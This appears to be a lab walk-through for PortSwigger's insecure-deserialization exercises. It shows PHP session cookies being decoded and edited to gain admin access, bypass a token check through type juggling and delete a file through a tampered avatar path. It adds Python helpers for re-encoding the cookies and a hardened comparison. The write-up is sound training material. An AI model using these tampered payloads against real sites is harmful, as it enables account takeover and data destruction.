Walk-through of the Insecure deserialization labs on PortSwigger Web Security Academy. See the topic page Exploiting insecure deserialization vulnerabilities.
The Burp Hackvertor extension is used to encode the payloads; the <@base64>...<@/base64> and <@base64url>...<@/base64url> tags in the requests below are Hackvertor tags that encode their contents before the request is sent.
- Apprentice – Modifying serialized objects
- Practitioner – Modifying serialized data types
- Practitioner – Using application functionality to exploit insecure deserialization
- Practitioner – Arbitrary object injection in PHP
- Practitioner – Exploiting Java deserialization with Apache Commons
- Practitioner – Exploiting PHP deserialization with a pre-built gadget chain
- Practitioner – Exploiting Ruby deserialization using a documented gadget chain
- Expert – Developing a custom gadget chain for Java deserialization
- Expert – Developing a custom gadget chain for PHP deserialization
- Expert – Using PHAR deserialization to deploy a custom gadget chain
Apprentice – Modifying serialized objects
To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete Carlos’s account.
Click on My account and log in with credentials wiener/peter. A session cookie is created.
Set-Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d;
Decode it (URL-decode, then base64-decode). The O:4:"User":2:{...} layout identifies it as a PHP serialized object.
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
Change the value of admin from false to true (b:0; to b:1;), then base64-encode the result.
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30=
Replace the session cookie value in your browser and refresh the page. The Admin panel is now accessible; use it to delete user carlos.
Practitioner – Modifying serialized data types
To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.
Hint: To access another user’s account, you will need to exploit a quirk in how PHP compares data of different types.
Click on My account and log in with credentials wiener/peter. A session cookie is created.
Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJmdGhnem13NnprcWE2cnY5Y3JzYTJ2M2Z2NGVkcTNsciI7fQ%3d%3d
Decode it (URL-decode, then base64-decode). As before, the layout identifies it as a PHP serialized object.
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"fthgzmw6zkqa6rv9crsa2v3fv4edq3lr";}
Change the username from wiener to administrator and adjust the string length prefix from 6 to 13 (PHP serialized strings are length-prefixed, so the prefix must match the new value), then base64-encode the result.
GET /my-account HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64url>O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"fthgzmw6zkqa6rv9crsa2v3fv4edq3lr";}<@/base64url>
...
The server responds with an error about the access token:
PHP Fatal error: Uncaught Exception: (DEBUG: $access_tokens[$user->username] = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx, $user->access_token = fthgzmw6zkqa6rv9crsa2v3fv4edq3lr, $access_tokens = [xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx,xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx,xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]) Invalid access token for user administrator in /var/www/index.php:8
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 8
Change the access token to the integer 0 (i:0;). The check compares the stored token with the submitted one using PHP's loose == operator, and in PHP 7 and earlier a non-numeric string compared with an integer is converted to 0, so 0 == "fthgzmw6zkqa6rv9crsa2v3fv4edq3lr" evaluates to true.
GET /my-account HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64url>O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}<@/base64url>
...
You can now access the Admin panel.
GET /admin HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64url>O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}<@/base64url>
Delete user carlos to solve the lab.
GET /admin/delete?username=carlos HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64url>O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}<@/base64url>
...
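Why the integer 0 passes the token check, and what a strict check looks like, as an added Python model (not the lab's PHP code) of PHP's int-vs-string rules for the loose == operator. It goes beyond the lab's single case by modelling both the PHP 7 and the PHP 8 behaviour; the hardened variant mirrors what is_string() plus hash_equals() would do in PHP.

```python
"""Why access_token => i:0 passes the lab's token check, and how to close it.
Added illustration, not the lab's server code: it reproduces PHP's int-vs-string
rules for the loose `==` operator (PHP 7 and PHP 8 differ) next to a strict check."""
import hmac
import re

# PHP 7: a string used in a numeric context takes its leading numeric prefix, else 0.
LEADING_NUMBER = re.compile(r'^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?')
# PHP 8: only a fully numeric string is compared with an int as a number.
NUMERIC_STRING = re.compile(r'^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?\s*$')


def php_loose_eq(a, b, php8: bool = False) -> bool:
    """Model of `$a == $b` for an int on one side and a string on the other."""
    if isinstance(a, str) and isinstance(b, int):
        a, b = b, a                              # normalise to (int, str)
    if isinstance(a, int) and isinstance(b, str):
        if php8:
            if NUMERIC_STRING.match(b):
                return float(a) == float(b)      # "1e3" == 1000 is still true
            return str(a) == b                   # otherwise the int becomes a string
        m = LEADING_NUMBER.match(b)
        return float(a) == (float(m.group(0)) if m else 0.0)
    return a == b                                # same types: ordinary comparison


def token_check_loose(stored: str, submitted, php8: bool = False) -> bool:
    """The lab's pattern: $access_tokens[$user->username] == $user->access_token."""
    return php_loose_eq(stored, submitted, php8)


def token_check_strict(stored: str, submitted) -> bool:
    """Hardened: refuse non-string input and compare in constant time
    (the PHP equivalent is checking is_string() and using hash_equals())."""
    return isinstance(submitted, str) and hmac.compare_digest(stored, submitted)
```

Note that the trick depends on the stored token not starting with a digit: under PHP 7 rules a token such as "4edq3lr" is compared as 4, so 0 would not match it.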
Practitioner – Using application functionality to exploit insecure deserialization
To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.
Click on My account and log in with credentials wiener/peter. A session cookie is created.
Set-Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ1OWU4Y3Rlc3MyY3czdjRjcDdyNjdvcGt2c2ZyNWxxZCI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d;
Decode it (URL-decode, then base64-decode). As before, the layout identifies it as a PHP serialized object.
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"u9e8ctess2cw3v4cp7r67opkvsfr5lqd";s:11:"avatar_link";s:19:"users/wiener/avatar";}
Change the value of avatar_link to /home/carlos/morale.txt and adjust the string length prefix from 19 to 23, then base64-encode the result.
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"u9e8ctess2cw3v4cp7r67opkvsfr5lqd";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
Intercept requests. On the My account page, click Delete account. Replace the session cookie value and forward the request: deleting the account also removes the file referenced by avatar_link, so the server deletes /home/carlos/morale.txt.
POST /my-account/delete HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64>O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"u9e8ctess2cw3v4cp7r67opkvsfr5lqd";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}<@/base64>
...
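The decode, edit and re-encode step used in all three labs above (Modifying serialized objects, Modifying serialized data types, Using application functionality), as an added Python example that is not the lab's code or Hackvertor's. It parses and rebuilds the PHP serialization format so that length prefixes are recomputed automatically instead of by hand, and assumes ASCII cookie values.

```python
"""Minimal PHP serialize()/unserialize() for the session cookies in these labs (added
example, not the lab's code). Supports s (string), i (integer), b (boolean) and O
(object); objects are (class_name, {field: value}). Assumes ASCII values (byte lengths)."""
import base64
from urllib.parse import quote, unquote

def php_unserialize(data: str, pos: int = 0):
    """Parse one value at data[pos]; return (value, position just after it)."""
    kind = data[pos]
    if kind in 'bi':                                  # b:1;   i:0;
        end = data.index(';', pos)
        raw = data[pos + 2:end]
        return (raw == '1' if kind == 'b' else int(raw)), end + 1
    if kind == 's':                                   # s:6:"wiener";
        colon = data.index(':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip the :" after the length
        return data[start:start + length], start + length + 2   # skip closing ";
    if kind == 'O':                                   # O:4:"User":2:{...}
        colon = data.index(':', pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len]
        p = colon + name_len + 4                      # skip ": after the class name
        colon2 = data.index(':', p)
        count, p, fields = int(data[p:colon2]), colon2 + 2, {}   # skip :{
        for _ in range(count):                        # each field is key then value
            key, p = php_unserialize(data, p)
            fields[key], p = php_unserialize(data, p)
        return (name, fields), p + 1                  # skip closing }
    raise ValueError(f'unsupported type {kind!r} at offset {pos}')

def php_serialize(value) -> str:
    """Inverse of php_unserialize; every length prefix is recomputed from the value."""
    if isinstance(value, bool):                       # before int: bool subclasses int
        return f'b:{int(value)};'
    if isinstance(value, int):
        return f'i:{value};'
    if isinstance(value, str):
        return f's:{len(value)}:"{value}";'
    name, fields = value
    body = ''.join(php_serialize(k) + php_serialize(v) for k, v in fields.items())
    return f'O:{len(name)}:"{name}":{len(fields)}:{{{body}}}'

def decode_cookie(cookie: str):                       # URL-decode, base64-decode, parse
    return php_unserialize(base64.b64decode(unquote(cookie)).decode())[0]

def encode_cookie(obj) -> str:                        # serialize, base64, URL-encode
    return quote(base64.b64encode(php_serialize(obj).encode()).decode())
```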